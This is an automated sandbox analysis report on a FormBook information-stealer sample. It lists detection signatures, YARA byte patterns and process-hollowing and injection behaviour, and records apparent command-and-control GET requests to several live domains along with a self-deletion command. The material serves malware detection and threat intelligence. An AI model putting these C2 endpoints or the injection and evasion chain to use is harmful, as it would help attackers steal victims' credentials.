Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report vOKMFxiCYt.exe

Overview

General Information

Sample Name:vOKMFxiCYt.exe
Analysis ID:321296
MD5:bb30a5dd4130b071fb4ca5f005371c63
SHA1:52c3ca02828a4ad8e8dbf790a61b3d77379ad391
SHA256:4c73fd4286e76a094eefafe5369f3a184ca4a38d567ae6dfad61645bf968a83f
Tags:exeFormbook

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • vOKMFxiCYt.exe (PID: 2764 cmdline: 'C:\Users\user\Desktop\vOKMFxiCYt.exe' MD5: BB30A5DD4130B071FB4CA5F005371C63)
    • RegSvcs.exe (PID: 5984 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • raserver.exe (PID: 5028 cmdline: C:\Windows\SysWOW64\raserver.exe MD5: 2AADF65E395BFBD0D9B71D7279C8B5EC)
          • cmd.exe (PID: 6040 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.272036979.00000000015B0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000002.272036979.00000000015B0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000002.272036979.00000000015B0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
    00000000.00000002.241947943.0000000002B43000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
      00000000.00000002.241858795.0000000002AC1000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
        Click to see the 19 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        1.2.RegSvcs.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.RegSvcs.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          1.2.RegSvcs.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x18409:$sqlite3step: 68 34 1C 7B E1
          • 0x1851c:$sqlite3step: 68 34 1C 7B E1
          • 0x18438:$sqlite3text: 68 38 2A 90 C5
          • 0x1855d:$sqlite3text: 68 38 2A 90 C5
          • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
          1.2.RegSvcs.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            1.2.RegSvcs.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
            • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
            • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
            • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
            • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
            • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
            • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
            • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
            • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
            • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
            Click to see the 1 entries

            Sigma Overview

            No Sigma rule has matched

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Multi AV Scanner detection for submitted fileShow sources
            Source: vOKMFxiCYt.exeReversingLabs: Detection: 35%
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000001.00000002.272036979.00000000015B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.271729564.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.242174585.0000000003AC9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.504019492.0000000001140000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.272011723.0000000001580000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.503167127.0000000000E00000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.505106609.0000000004AF0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 1.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Machine Learning detection for sampleShow sources
            Source: vOKMFxiCYt.exeJoe Sandbox ML: detected
            Source: 1.2.RegSvcs.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.3:49737
            Source: global trafficHTTP traffic detected: GET /glt/?SP=cnxhAdAh&V4=RXCBf+kTtqMKofvvq54zDDgrcqehmcxCBUCamp/3E7fzZOB7U/XBgSeZZ5TRQ//94zw4 HTTP/1.1Host: www.tessuto.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /glt/?V4=MLpAZ0AK/spUlt1gTLvrDwTqfxMoBLVQzrzuTOkSqlsdFHJLAwBY2ZzU1xSBGMRzyeG8&SP=cnxhAdAh HTTP/1.1Host: www.reem.proConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /glt/?SP=cnxhAdAh&V4=oeIisVoovR5GVMPXvvkWG2hSa0zFuUbByopAkVC9hBB+Ndji49czoVDBLaeM7MDZ9TnP HTTP/1.1Host: www.themaskedstitcher.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /glt/?V4=hWCSv9Zrwql4NKRqpOYz8tuCeFQ4j+1tRbbWxD4HfruMRkMSYBHm3MJuhB2jB30ChDel&SP=cnxhAdAh HTTP/1.1Host: www.auctionpros.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: Joe Sandbox ViewIP Address: 198.49.23.141 198.49.23.141
            Source: Joe Sandbox ViewIP Address: 34.102.136.180 34.102.136.180
            Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
            Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
            Source: global trafficHTTP traffic detected: GET /glt/?SP=cnxhAdAh&V4=RXCBf+kTtqMKofvvq54zDDgrcqehmcxCBUCamp/3E7fzZOB7U/XBgSeZZ5TRQ//94zw4 HTTP/1.1Host: www.tessuto.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /glt/?V4=MLpAZ0AK/spUlt1gTLvrDwTqfxMoBLVQzrzuTOkSqlsdFHJLAwBY2ZzU1xSBGMRzyeG8&SP=cnxhAdAh HTTP/1.1Host: www.reem.proConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /glt/?SP=cnxhAdAh&V4=oeIisVoovR5GVMPXvvkWG2hSa0zFuUbByopAkVC9hBB+Ndji49czoVDBLaeM7MDZ9TnP HTTP/1.1Host: www.themaskedstitcher.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /glt/?V4=hWCSv9Zrwql4NKRqpOYz8tuCeFQ4j+1tRbbWxD4HfruMRkMSYBHm3MJuhB2jB30ChDel&SP=cnxhAdAh HTTP/1.1Host: www.auctionpros.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: unknownDNS traffic detected: queries for: www.tessuto.net
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 20 Nov 2020 19:05:26 GMTContent-Type: text/htmlContent-Length: 153Connection: closeServer: nginx/1.16.1Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>
            Source: raserver.exe, 00000004.00000002.506812727.000000000574F000.00000004.00000001.sdmpString found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=
            Source: explorer.exe, 00000002.00000000.257287184.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
            Source: vOKMFxiCYt.exe, 00000000.00000002.241858795.0000000002AC1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
            Source: explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
            Source: explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
            Source: explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
            Source: explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: vOKMFxiCYt.exe, 00000000.00000002.241448279.0000000000D2A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

            E-Banking Fraud:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000001.00000002.272036979.00000000015B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.271729564.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.242174585.0000000003AC9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.504019492.0000000001140000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.272011723.0000000001580000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.503167127.0000000000E00000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.505106609.0000000004AF0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 1.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 00000001.00000002.272036979.00000000015B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000001.00000002.272036979.00000000015B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000001.00000002.271729564.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000001.00000002.271729564.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.242174585.0000000003AC9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.242174585.0000000003AC9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000004.00000002.504019492.0000000001140000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000004.00000002.504019492.0000000001140000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000001.00000002.272011723.0000000001580000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000001.00000002.272011723.0000000001580000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000004.00000002.503167127.0000000000E00000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000004.00000002.503167127.0000000000E00000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000004.00000002.505106609.0000000004AF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000004.00000002.505106609.0000000004AF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 1.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 1.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00419D60 NtCreateFile,1_2_00419D60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00419E10 NtReadFile,1_2_00419E10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00419E90 NtClose,1_2_00419E90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00419F40 NtAllocateVirtualMemory,1_2_00419F40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00419E8A NtClose,1_2_00419E8A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01699910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_01699910
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016999A0 NtCreateSection,LdrInitializeThunk,1_2_016999A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01699860 NtQuerySystemInformation,LdrInitializeThunk,1_2_01699860
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01699840 NtDelayExecution,LdrInitializeThunk,1_2_01699840
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016998F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_016998F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01699A50 NtCreateFile,LdrInitializeThunk,1_2_01699A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01699A20 NtResumeThread,LdrInitializeThunk,1_2_01699A20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01699A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_01699A00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01699540 NtReadFile,LdrInitializeThunk,1_2_01699540
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016995D0 NtClose,LdrInitializeThunk,1_2_016995D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01699710 NtQueryInformationToken,LdrInitializeThunk,1_2_01699710
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016997A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_016997A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01699780 NtMapViewOfSection,LdrInitializeThunk,1_2_01699780
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01699660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_01699660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016996E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_016996E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01699950 NtQueueApcThread,1_2_01699950
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016999D0 NtCreateProcessEx,1_2_016999D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0169B040 NtSuspendThread,1_2_0169B040
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01699820 NtEnumerateKey,1_2_01699820
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016998A0 NtWriteVirtualMemory,1_2_016998A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01699B00 NtSetValueKey,1_2_01699B00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0169A3B0 NtGetContextThread,1_2_0169A3B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01699A10 NtQuerySection,1_2_01699A10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01699A80 NtOpenDirectoryObject,1_2_01699A80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01699560 NtWriteFile,1_2_01699560
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01699520 NtWaitForSingleObject,1_2_01699520
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0169AD30 NtSetContextThread,1_2_0169AD30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016995F0 NtQueryInformationFile,1_2_016995F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01699760 NtOpenProcess,1_2_01699760
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01699770 NtSetInformationFile,1_2_01699770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0169A770 NtOpenThread,1_2_0169A770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01699730 NtQueryVirtualMemory,1_2_01699730
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0169A710 NtOpenProcessToken,1_2_0169A710
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01699FE0 NtCreateMutant,1_2_01699FE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01699670 NtQueryInformationProcess,1_2_01699670
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01699650 NtQueryValueKey,1_2_01699650
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01699610 NtEnumerateValueKey,1_2_01699610
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016996D0 NtCreateKey,1_2_016996D0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D99840 NtDelayExecution,LdrInitializeThunk,4_2_04D99840
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D99860 NtQuerySystemInformation,LdrInitializeThunk,4_2_04D99860
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D995D0 NtClose,LdrInitializeThunk,4_2_04D995D0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D999A0 NtCreateSection,LdrInitializeThunk,4_2_04D999A0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D99540 NtReadFile,LdrInitializeThunk,4_2_04D99540
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D99910 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_04D99910
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D996D0 NtCreateKey,LdrInitializeThunk,4_2_04D996D0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D996E0 NtFreeVirtualMemory,LdrInitializeThunk,4_2_04D996E0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D99A50 NtCreateFile,LdrInitializeThunk,4_2_04D99A50
